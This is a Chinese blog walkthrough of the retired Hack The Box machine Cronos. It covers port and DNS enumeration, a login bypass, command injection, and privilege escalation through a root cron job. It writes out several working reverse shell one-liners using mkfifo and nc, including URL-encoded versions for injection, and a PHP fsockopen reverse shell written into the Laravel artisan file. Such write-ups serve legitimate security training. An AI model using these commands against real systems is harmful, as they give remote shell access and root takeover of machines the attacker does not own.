• HTB-靶机-Cronos


    本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

    靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.13

    nmap -sV -sC -p- -T5 -oN cronos.nmap 10.10.10.13

    nmap扫描结果

    根据扫描结果开放了3个端口,奇怪的是还有dns服务,瞬间觉得跟解析有关,而且既然是跟dns有关,那么可能逃不开DNS区域传送之类的漏洞,所以本地绑定hosts 继续搞

    发现有个admin域名,加进去继续搞

    然后访问80端口的域名

    是个登录界面,试了下万能密码居然就进去了

    进去之后根据经验就知道有命令执行漏洞,玩过DVWA的就知道了,所以测试下验证结果

    确认没有问题,直接反弹shell,这里试了下直接使用nc进行反弹shell,有问题,需要使用不带nc参数-e的反弹命令进行反弹,当然这里也发现有python环境,反弹姿势很多

    反弹shell形式,nc没有参数e的时候执行
    rm -rf /tmp/p; mknod /tmp/p p; /bin/sh 0</tmp/p | nc 10.10.14.4 8833 1>/tmp/p

    其他形式的没有nc参数e的反弹命令
    正常命令:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.41 1234 >/tmp/f
    写法1:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>%261|nc 10.10.14.41 1234 >/tmp/f
    写法2:rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.41+1234+>/tmp/f
    上面因为&会被用于分割两个参数,所以要把&符号转义成%26

    成功反弹shell之后,使用 https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh 枚举操作系统可以提权的信息,确认一个计划任务是使用root执行,可以更改此计划任务执行反弹shell进行提权

    得到上面计划任务提权的方式,就更改文件artisan即可提权成功,下面是基本的两种方式

    可以使用下面两种
    执行php反弹shell
    1. 使用pipe通道稳定反弹
    echo '<?php $sock = fsockopen("10.10.14.41",1337);$proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);?>' > /var/www/laravel/artisan
    
    2. 使用php-reverse-shell反弹shell
    https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

    提权成功拿到flag.txt

    迷茫的人生,需要不断努力,才能看清远方模糊的志向!
  • 相关阅读:
    classic problem: select sortjava
    【转】排序算法复习(Java实现)(二): 归并排序,堆排序,桶式排序,基数排序
    【转】排序算法复习(Java实现)(一): 插入,冒泡,选择,Shell,快速排序
    classic problem: 100 horse and 100 dan
    good chocolate
    【转】Java内存模型 http://blog.csdn.net/silentbalanceyh
    http header/ eclipse package path
    design patterns: factory and abstractFactory
    阅读笔记
    提取Dump文件的Callstack,创建windbg的一个扩展应用
  • 原文地址:https://www.cnblogs.com/autopwn/p/13913596.html
Copyright © 2020-2023  润新知